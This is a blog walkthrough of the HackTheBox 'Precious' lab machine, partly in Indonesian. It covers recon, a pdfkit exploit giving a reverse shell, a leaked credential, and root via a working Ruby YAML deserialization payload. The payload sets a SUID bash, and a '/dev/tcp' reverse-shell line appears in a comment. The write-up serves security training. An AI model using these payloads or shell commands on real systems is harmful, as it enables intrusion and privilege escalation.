Post

HackTheBox - Precious

Posted Updated
By Muhammad Khoirul Huda
5 min read

Desktop View

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

# Nmap 7.94 scan initiated Mon Feb  5 23:08:59 2024 as: nmap -sCV -T4 -oN nmap.txt 10.10.11.189
Nmap scan report for JSN.JaringanKU (10.10.11.189)
Host is up (0.042s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb  5 23:09:10 2024 -- 1 IP address (1 host up) scanned in 10.97 seconds

1

echo "10.10.11.189 precious.htb" | sudo tee -a /etc/hosts

Browser

Desktop View

1
2
3

❯ vim test.txt
❯ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Desktop View

Desktop View

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

❯ exiftool ouw1241pjvgxxd5vehgondzv0mtdaw5p.pdf
ExifTool Version Number         : 12.70
File Name                       : ouw1241pjvgxxd5vehgondzv0mtdaw5p.pdf
Directory                       : .
File Size                       : 9.8 kB
File Modification Date/Time     : 2024:02:06 08:13:14+07:00
File Access Date/Time           : 2024:02:06 08:13:15+07:00
File Inode Change Date/Time     : 2024:02:06 08:18:37+07:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

Nah, ada yang menarik nih. Generated by pdfkit v0.8.6 coba kita cari eksploitnya. Dan saya menemukan > ini <

Desktop View Desktop View Desktop View Desktop View

Shell into Ruby

Desktop View

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

❯ nc -nvlp 9001
Connection from 10.10.11.189:34656
bash: cannot set terminal process group (679): Inappropriate ioctl for device
bash: no job control in this shell
ruby@precious:/var/www/pdfapp$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
ruby@precious:/var/www/pdfapp$ export TERM=xterm
export TERM=xterm
ruby@precious:/var/www/pdfapp$ ^Z
[1]  + 47516 suspended  nc -nvlp 9001

❯ stty raw -echo; fg
[1]  + 47516 continued  nc -nvlp 9001

ruby@precious:/var/www/pdfapp$ cd
ruby@precious:~$ ls
ruby@precious:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for ruby:

ruby@precious:~$ ls -la
total 28
drwxr-xr-x 4 ruby ruby 4096 Feb  5 11:09 .
drwxr-xr-x 4 root root 4096 Oct 26  2022 ..
lrwxrwxrwx 1 root root    9 Oct 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby  220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby 4096 Oct 26  2022 .bundle
drwxr-xr-x 4 ruby ruby 4096 Feb  5 11:16 .cache
-rw-r--r-- 1 ruby ruby  807 Mar 27  2022 .profile
ruby@precious:~$ cd .bundle
ruby@precious:~/.bundle$ ls -la
total 12
dr-xr-xr-x 2 root ruby 4096 Oct 26  2022 .
drwxr-xr-x 4 ruby ruby 4096 Feb  5 11:09 ..
-r-xr-xr-x 1 root ruby   62 Sep 26  2022 config
ruby@precious:~/.bundle$ cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

Shell into Henry

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

 ssh henry@precious.htb
henry@precious.htb''s password: 
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb  5 20:42:17 2024 from 10.10.14.26
henry@precious:~$ ls
user.txt
henry@precious:~$ cat user.txt
7754ab9bcbd0e58ec245c32c972eeb09
henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
Traceback (most recent call last):
	2: from /opt/update_dependencies.rb:17:in `<main>'
	1: from /opt/update_dependencies.rb:10:in `list_from_file'
/opt/update_dependencies.rb:10:in `read`: No such file or directory @ rb_sysopen - dependencies.yml (Errno::ENOENT)

Coba cari digoogle dependencies.yml privilege escalation. Saya menemukan > ini <

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cp /bin/bash /tmp/kz; chmod 6777 /tmp/kz
         method_id: :resolve
# "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

henry@precious:/dev/shm$ wget 10.10.14.26:7890/dependencies.yml
--2024-02-05 21:10:41--  http://10.10.14.26:7890/dependencies.yml
Connecting to 10.10.14.26:7890... connected.
HTTP request sent, awaiting response... 200 OK
Length: 638 [application/octet-stream]
Saving to: ‘dependencies.yml’

dependencies.yml         100%[================================>]     638  --.-KB/s    in 0s      

2024-02-05 21:10:41 (59.7 MB/s) - ‘dependencies.yml’ saved [638/638]

henry@precious:/dev/shm$ sudo ruby /opt/update_dependencies.rb 
sh: 1: reading: not found
Traceback (most recent call last):
	33: from /opt/update_dependencies.rb:17:in `<main>'
	32: from /opt/update_dependencies.rb:10:in `list_from_file'
	<snip><snip>
	1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'
/usr/lib/ruby/2.7.0/net/protocol.rb:458:in `system': no implicit conversion of nil into String (TypeError)
henry@precious:/dev/shm$ ls /tmp/kz
/tmp/kz
henry@precious:/dev/shm$ /tmp/kz -p
kz-5.1# ls
dependencies.yml
kz-5.1# cd /root
kz-5.1# ls
root.txt
kz-5.1# cat root.txt
8e1ac4e7ff3b4d430a90c02493eb8cd4
kz-5.1#
HackTheBox, Machines
easy
This post is licensed under CC BY 4.0 by the author.